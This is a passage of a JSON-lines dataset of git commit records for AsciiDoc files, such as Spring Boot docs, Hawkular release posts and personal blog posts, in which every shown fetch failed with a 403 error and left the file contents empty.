/jenkins2-course-spring-boot,habuma\/spring-boot,minmay\/spring-boot,cleverjava\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,ihoneymon\/spring-boot,candrews\/spring-boot,vpavic\/spring-boot,bjornlindstrom\/spring-boot,sbcoba\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,olivergierke\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,ameraljovic\/spring-boot,sebastiankirsch\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,NetoDevel\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,candrews\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,zhangshuangquan\/spring-root,SaravananParthasarathy\/SPSDemo,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,jvz\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,deki\/spring-boot,mosoft521\/spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,jvz\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,lenicliu\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,DeezCashews\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,isopov\/spring-boot,joshthornhill\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,brettwooldridge\/spring-boot,mrumpf\/spring-boot,yangdd12
05\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,eddumelendez\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,htynkn\/spring-boot,neo4j-contrib\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,zhanhb\/spring-boot,dfa1\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mrumpf\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot-concourse,afroje-reshma\/spring-boot-sample,ameraljovic\/spring-boot,hello2009chen\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8343667b99e6a37462a527010accf8a044a2ffb5","subject":"Announce h-services 0.20 (#249)","message":"Announce h-services 0.20 (#249)\n\n","repos":"pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/11\/09\/hawkular-services-0.20.0.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/11\/09\/hawkular-services-0.20.0.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"be453de7d68f0050b3a39a50447b480ae3a43d69","subject":"Hawkular Metrics 0.13.0 - Release","message":"Hawkular Metrics 0.13.0 - 
Release\n","repos":"hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/02\/hawkular-metrics-0.13.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/02\/hawkular-metrics-0.13.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e033939e23d7bdc738421c964c212f7c57b286ec","subject":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","message":"Update 2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1940c75d2768258452bc911c34677e335757808","subject":"Add COMMITTERS.adoc","message":"Add COMMITTERS.adoc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"COMMITTERS.adoc","new_file":"COMMITTERS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c23436024a6a3dab26fe1d7e03aafadbf92c172c","subject":"Update 2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","message":"Update 2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","new_file":"_posts\/2015-10-12-The-Magical-World-of-Software-Defined-Radio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f787b445b61ecfb8dd7f1a452002973ac290b782","subject":"Update 2016-04-17-Nuevo-post.adoc","message":"Update 
2016-04-17-Nuevo-post.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2016-04-17-Nuevo-post.adoc","new_file":"_posts\/2016-04-17-Nuevo-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71847406c2b90cde764925c9ab6378577a4c90d7","subject":"y2b create post Megapixel Madness! (Nokia Lumia 1020 Unboxing \\u0026 Camera Test)","message":"y2b create post Megapixel Madness! (Nokia Lumia 1020 Unboxing \\u0026 Camera Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-11-Megapixel-Madness-Nokia-Lumia-1020-Unboxing-u0026-Camera-Test.adoc","new_file":"_posts\/2013-09-11-Megapixel-Madness-Nokia-Lumia-1020-Unboxing-u0026-Camera-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8e344af5b8f2a7ca4757f5e95b153301a7de8e9","subject":"Publish 2016-12-1-re-Invent2016.adoc","message":"Publish 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-re-Invent2016.adoc","new_file":"2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09996ee6bce691af0857d85bbdf62ceae61df3dc","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caf94e41002830501a0fb6a50688b77f271d888","subject":"y2b create post GLIF Tripod Mount \\u0026 Stand for iPhone 4 \\\/ 4S Review","message":"y2b create post GLIF Tripod Mount \\u0026 Stand for iPhone 4 \\\/ 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-28-GLIF-Tripod-Mount-u0026-Stand-for-iPhone-4--4S-Review.adoc","new_file":"_posts\/2011-11-28-GLIF-Tripod-Mount-u0026-Stand-for-iPhone-4--4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af46f6e5b176ad2582985af8c58484f707f8cbdd","subject":"Update 
2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","message":"Update 2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_file":"_posts\/2017-01-25-Using-optional-arguments-in-the-MATLAB-Java-interface.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333d253173d96c2c3db29d70c597317c477f070d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"609f5b94c9267759d55beddfc6ac911780e0ed35","subject":"Update 2017-03-31-Linux-kill-process-by-user-executable.adoc","message":"Update 2017-03-31-Linux-kill-process-by-user-executable.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-31-Linux-kill-process-by-user-executable.adoc","new_file":"_posts\/2017-03-31-Linux-kill-process-by-user-executable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db5045c22cd0b8d8988a760eb6819c58e6e27489","subject":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"y2b create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_file":"_posts\/2018-02-23-3UniqueGadgetsYouWouldntExpectToExist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e46badffdb15d083714101783fae78fce8fa680","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e51661fdea5df9c67ed73296bd2ad33199675b0","subject":"y2b create post 4K Surround Gaming Setup With 4 NVIDIA Titans! 
(CES 2014)","message":"y2b create post 4K Surround Gaming Setup With 4 NVIDIA Titans! (CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-07-4K-Surround-Gaming-Setup-With-4-NVIDIA-Titans-CES-2014.adoc","new_file":"_posts\/2014-01-07-4K-Surround-Gaming-Setup-With-4-NVIDIA-Titans-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f9903fdd22b819c8984ac8f6761d3eec931555","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2f172b93508d4307c16d921a2374a8574118839","subject":"Added When EIP docs","message":"Added When EIP docs\n","repos":"tadayosi\/camel,curso007\/camel,anoordover\/camel,christophd\/camel,curso007\/camel,jonmcewen\/camel,jamesnetherton\/camel,DariusX\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,onders86\/camel,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,gnodet\/camel,cunningt\/camel,sverkera\/camel,snurmine\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,snurmine\/camel,dmvolod\/camel,apache\/camel,pax95\/camel,punkhorn\/camel-upstream,sverkera\/camel,apache\/camel,akhettar\/camel,nicolaferraro\/camel,pax95\/camel,anoordover\/camel,objectiser\/camel,tdiesler\/camel,kevinearls\/camel,tadayosi\/camel,davidkarlsen\/camel,zregvart\/camel,jamesnetherton\/camel,akhettar\/camel,kevinearls\/camel,objectiser\/camel,onders86\/camel,curso007\/camel,christophd\/camel,onders86\/camel,anoordover\/camel,tdiesler\/camel,snurmine\/camel,ullgren\/camel,adessaigne\/camel,jamesnetherton\/camel,dmvolod\/camel,gautric\/camel,dmvolod\/camel,pax95\/camel,jamesnetherton\/camel,adessaigne\/camel,pmoerenhout\/camel,curso007\/camel,adessaigne\/camel,alvinkwekel\/camel,anoordover\/camel,ullgren\/camel,gautric\/camel,tadayosi\/camel,snurmine\/camel,dmvolod\/camel,sverkera\/camel,DariusX\/camel,gnodet\/camel,nicolaferraro\/camel,jonmcewen\/camel,kevinearls\/camel,mcollovati\/camel,onders86\/camel,alvinkwekel\/camel,kevinearls\/camel,dmvolod\/camel,davidkarlsen\/camel,jonmcewen\/camel,jonmcewen\/camel,gnodet\/camel,apache\/camel,sverkera\/camel,jamesnetherton\/camel,nicolaferraro\/camel,gnodet\/camel,gautric\/camel,dmvolod\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tdiesler\/camel,ullgren\/camel,onders86\/camel,DariusX\/camel,mcollovati\/camel,nikhilvibhav\/camel,sverkera\/camel,sverkera\/camel,christophd\/camel,tdiesler\/camel,objectiser\/camel,jonmcewen\/camel,Fabryprog\/camel,apache\/camel,jamesnetherton\/camel,DariusX\/camel,pax95\/camel,zregvart\/camel,onders86\/camel,davidkarlsen\/camel,anoordover\/camel,apache\/camel,adessaigne\/camel,zregvart\/camel,Fabryprog\/camel,Fabryprog\/camel,CodeSmell\/camel,p
ax95\/camel,punkhorn\/camel-upstream,akhettar\/camel,akhettar\/camel,tdiesler\/camel,cunningt\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,gautric\/camel,Fabryprog\/camel,adessaigne\/camel,gnodet\/camel,mcollovati\/camel,tadayosi\/camel,jonmcewen\/camel,objectiser\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,anoordover\/camel,kevinearls\/camel,curso007\/camel,akhettar\/camel,snurmine\/camel,cunningt\/camel,gautric\/camel,akhettar\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,christophd\/camel,snurmine\/camel,pmoerenhout\/camel,zregvart\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,christophd\/camel,curso007\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/when-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/when-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e49a9a8a345e0b68ac4e92f7bd917d792b85e6f6","subject":"y2b create post 60-inch TV Giveaway + Twitter Q\\u0026A!","message":"y2b create post 60-inch TV Giveaway + Twitter Q\\u0026A!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-28-60inch-TV-Giveaway--Twitter-Qu0026A.adoc","new_file":"_posts\/2013-01-28-60inch-TV-Giveaway--Twitter-Qu0026A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c159c21f7f16e23719913c9934e9329cfd2fd9e","subject":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8697c9229a21c00574b9937caa14800edb20969","subject":"Update 2016-08-23-Real-Time-Control-Operating-Systems.adoc","message":"Update 2016-08-23-Real-Time-Control-Operating-Systems.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-08-23-Real-Time-Control-Operating-Systems.adoc","new_file":"_posts\/2016-08-23-Real-Time-Control-Operating-Systems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"222de061dba5f1c82f45652c3530c399b2831b86","subject":"CL note: ls","message":"CL note: 
ls\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea5195c8a68ad83af7da460af4093afb49c4cf8c","subject":"Better document how DataSource is bound to the env","message":"Better document how DataSource is bound to the env\n\nCloses gh-4971\n","repos":"lexandro\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,kamilszymanski\/spring-boot,jbovet\/spring-boot,cleverjava\/jenkins2-course-spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,lexandro\/spring-boot,NetoDevel\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,habuma\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,mbogoevici\/spring-boot,shakuzen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,candrews\/spring-boot,mosoft521\/spring-boot,scottfrederick\/spring-boot,zhanhb\/spring-boot,akmaharshi\/jenkins,lexandro\/spring-boot,bijukunjummen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,minmay\/spring-boot,neo4j-contrib\/spring-boot,lburgazzoli\/spring-boot,joansmith\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,lucassaldanha\/spring-boot,sebastiankirsch\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,jayarampradhan\/spring-boot,jmnarloch\/spring-boot,felipeg48\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,habuma\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,DeezCashews\/spring-boot,mdeinum\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,joshiste\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,olivergierke\/spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,ollie314\/spring-boot,bijukunjummen\/spring-boot,vakninr\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,jxblum\/spring-boot,xiaoleiPENG\/my-project,tiarebalbi\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,afroje-reshma\/spring-boot-sample,DeezCashews\/spring-boot,nebhale\/spring-boot,lenicliu\/spring-boot,lucassaldanha\/spring-boot,akmaharshi\/jenkins,kamilszymanski\/spring-boot,lburgazzoli\/spring-boot,brettwooldridge\/spring-boot,shangyi0102\/spring-boot,scottfrederick\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,deki\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,jayarampradhan\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,bbrouwer\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,akmaharshi\/jenkins,qerub\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spri
ng-boot,rajendra-chola\/jenkins2-course-spring-boot,olivergierke\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,yhj630520\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,sbcoba\/spring-boot,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,chrylis\/spring-boot,RichardCSantana\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,jvz\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,thomasdarimont\/spring-boot,nebhale\/spring-boot,joansmith\/spring-boot,herau\/spring-boot,jvz\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,donhuvy\/spring-boot,bbrouwer\/spring-boot,vakninr\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,olivergierke\/spring-boot,olivergierke\/spring-boot,mosoft521\/spring-boot,afroje-reshma\/spring-boot-sample,thomasdarimont\/spring-boot,izeye\/spring-boot,herau\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,brettwooldridge\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,joshthornhill\/spring-boot,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,i007422\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,michael-simons\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,lexandro\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,pvorb\/spring-boot,qerub\/spring-boot,ollie314\/spring-boot,joansmith\/spring-boot,chrylis\/spring-boot,scottfrederick\/spring-boot,royclarkson\/spring-boot,Buzzardo\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,vakninr\/spring-boot,htynkn\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot